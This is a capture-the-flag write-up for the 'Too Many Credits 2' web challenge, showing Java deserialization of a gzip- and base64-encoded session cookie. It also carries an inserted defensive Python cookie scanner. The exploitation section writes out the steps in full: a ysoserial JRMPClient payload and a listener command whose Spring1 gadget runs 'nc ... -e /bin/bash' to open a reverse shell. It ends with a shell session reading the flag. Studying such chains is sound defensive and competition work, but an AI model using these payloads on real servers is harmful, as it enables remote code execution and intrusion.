Too Many Credits 2 [web]

Even if you could get the first flag, I bet you can't pop a shell!

Recon

Same server as "Too many credits 1".

The session cookie is base64-encoded, gzip-compressed Java serialized data. That points to a possible deserialization RCE.
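The recon step above is done by hand on one cookie; as an added, defender-side example (not code from the writeup or from the challenge), the Python below automates the same check so it can run over logged cookie values: undo base64 and gzip, test for the Java object-stream magic, and heuristically list the class names in TC_CLASSDESC records so anything outside the set of classes the application actually stores can be flagged. The allowlist, the sample cookies and the dummy serialVersionUID are constructed assumptions, and the class-name scan is a triage heuristic rather than a full parser of the serialization format.

```python
import base64
import gzip
import re
import struct
import zlib
from typing import Dict, List, Optional

# Java ObjectOutputStream header: STREAM_MAGIC (0xACED) followed by STREAM_VERSION (5)
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_OBJECT = 0x73      # a new object follows
TC_CLASSDESC = 0x72   # new class descriptor: 2-byte length + class name + serialVersionUID ...

# Classes the application legitimately stores in its session cookie.
# ASSUMPTION for this example: the real set must come from the app's own session code.
ALLOWLIST = {"java.util.HashMap", "java.lang.Integer", "java.lang.String"}

# Plain or array class names as written in a descriptor, e.g. "java.util.HashMap", "[Ljava.lang.Object;"
CLASS_NAME = re.compile(rb"\[*[A-Za-z_$][A-Za-z0-9_$.]*;?")


def decode_cookie(value: str) -> Optional[bytes]:
    """Undo the cookie's wrapping: base64, then gzip if the gzip header is present."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    if raw[:2] == b"\x1f\x8b":  # gzip member header
        try:
            raw = gzip.decompress(raw)
        except (OSError, EOFError, zlib.error):
            return None
    return raw


def is_java_serialized(data: bytes) -> bool:
    return data.startswith(JAVA_STREAM_MAGIC)


def referenced_classes(data: bytes) -> List[str]:
    """Heuristic scan: every TC_CLASSDESC whose length-prefixed name looks like a class name.
    Not a full parser (no back-references, no TC_PROXYCLASSDESC); good enough for triage."""
    names: List[str] = []
    i = 0
    while True:
        i = data.find(bytes([TC_CLASSDESC]), i)
        if i < 0 or i + 3 > len(data):
            break
        (length,) = struct.unpack_from(">H", data, i + 1)
        candidate = data[i + 3 : i + 3 + length]
        if length and len(candidate) == length and CLASS_NAME.fullmatch(candidate):
            names.append(candidate.decode("ascii"))
            i += 3 + length       # skip the name so bytes inside it are not rescanned
        else:
            i += 1
    return names


def inspect_cookie(value: str) -> Dict[str, object]:
    """Classify one cookie value: is it a Java object stream, and does it name classes outside ALLOWLIST?"""
    data = decode_cookie(value)
    if data is None or not is_java_serialized(data):
        return {"java_serialized": False, "classes": [], "unexpected": []}
    classes = referenced_classes(data)
    return {
        "java_serialized": True,
        "classes": classes,
        "unexpected": sorted(set(classes) - ALLOWLIST),
    }


# --- constructed samples (not captured from the challenge server) ---------------------

def build_stream(class_names: List[str]) -> bytes:
    """Minimal object-stream prefix naming the given classes; enough for the scanner above."""
    out = bytearray(JAVA_STREAM_MAGIC)
    for name in class_names:
        nb = name.encode("ascii")
        out += bytes([TC_OBJECT, TC_CLASSDESC]) + struct.pack(">H", len(nb)) + nb
        out += struct.pack(">q", 0x1122334455667788)   # dummy serialVersionUID
        out += b"\x02"                                  # SC_SERIALIZABLE
        out += b"\x00\x00"                              # zero fields
        out += b"\x78\x70"                              # TC_ENDBLOCKDATA, TC_NULL (no superclass)
    return bytes(out)


def encode_cookie(data: bytes) -> str:
    """Same wrapping the challenge used: gzip, then base64."""
    return base64.b64encode(gzip.compress(data)).decode("ascii")


SAFE_COOKIE = encode_cookie(build_stream(["java.util.HashMap"]))
SUSPECT_COOKIE = encode_cookie(build_stream(["java.util.HashMap", "com.example.Unexpected"]))
PLAIN_COOKIE = base64.b64encode(b"user=alice").decode("ascii")   # base64, but not an object stream

if __name__ == "__main__":
    for label, cookie in [("safe", SAFE_COOKIE), ("suspect", SUSPECT_COOKIE), ("plain", PLAIN_COOKIE)]:
        print(label, inspect_cookie(cookie))
```

The same allowlist idea is what a server-side deserialization filter enforces before any object is reconstructed; the scanner only mirrors it on the wire so that a cookie naming classes the session never contains shows up in logs, whether or not the filter is in place.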

Plan

  • Analyze the "normal" serialized data in the cookie
  • Enumerate the technologies in use (maybe Spring/Spring Boot?)
  • Spring Framework is in use; no specific version identified

Responses

The server responds to any URI with the main routine, e.g.:

  • /klsajlfksdjfljdslak results in the main page being shown.
  • /favicon.ico actually results in an icon.

Trying a different method to see what happens:

$ curl -X DELETE 'http://toomanycredits.tamuctf.com/'
{
    "error": "Method Not Allowed",
    "exception": "org.springframework.web.HttpRequestMethodNotSupportedException",
    "message": "Request method 'DELETE' not supported",
    "path": "/",
    "status": 405,
    "timestamp": 1584723698736
}

Given that, we know that at least the package org.springframework.web is loaded in the classpath of some classloader. We would have to see whether there are gadgets in spring-web itself or in any of its dependencies, along with the usual suspects, e.g. Apache Commons.

Available ysoserial gadgets

The JRMPClient payload seems to work. It needs a server listening for JRMP connections; ysoserial's own listener serves that role and delivers a second-stage payload that will hopefully do the job. Payload tested:

Payload generation with JRMPClient

$ java -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient 'redacted:2020' | gzip - | base64 | tr -d '\n'
H4sIAAAAAAAAA1vzloG1uJaBgYGRQSorsSxRryg3U68oNT2zuKSoUi8IyqgoYhAHy+Yk5qUDpdNyUpNL9AKK8isqH6rfUjgj4HyaiYHRh4Exo4RB1QekUh+kUh+qUt8zryw/ObEkMz/PIzEvJSe1yLqioLiIQRduY3FqUVlqEdC+3PySVP+kLKAmDD0MEMDExMAAdI8MPr2XE7dM5Ek0lmMGKi0oN2TgCs3LTE4sLglKTWPgKEpNSUwuSU1hYGB/8h8IWgSKYhlQQQUARte0eBcBAAA=

Set up a JRMPListener on the server on port 2020, and a listener for a shell on port 2025:

~/ysoserial# java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 2020 Spring1 'nc redacted 2025 -e /bin/bash'
* Opening JRMP listener on 2020

We make an HTTP request with our payload as the cookie and get a connection back:

misc:~# nc -lvp 2025
listening on [any] 2025 ...
connect to [49.12.39.229] from ec2-34-208-211-186.us-west-2.compute.amazonaws.com [34.208.211.186] 43713
ls
bin
flag.txt
lib
cat flag
cat flag.txt
gigem{da$h_3_1s_A_l1f3seNd}

Flag

gigem{da$h_3_1s_A_l1f3seNd}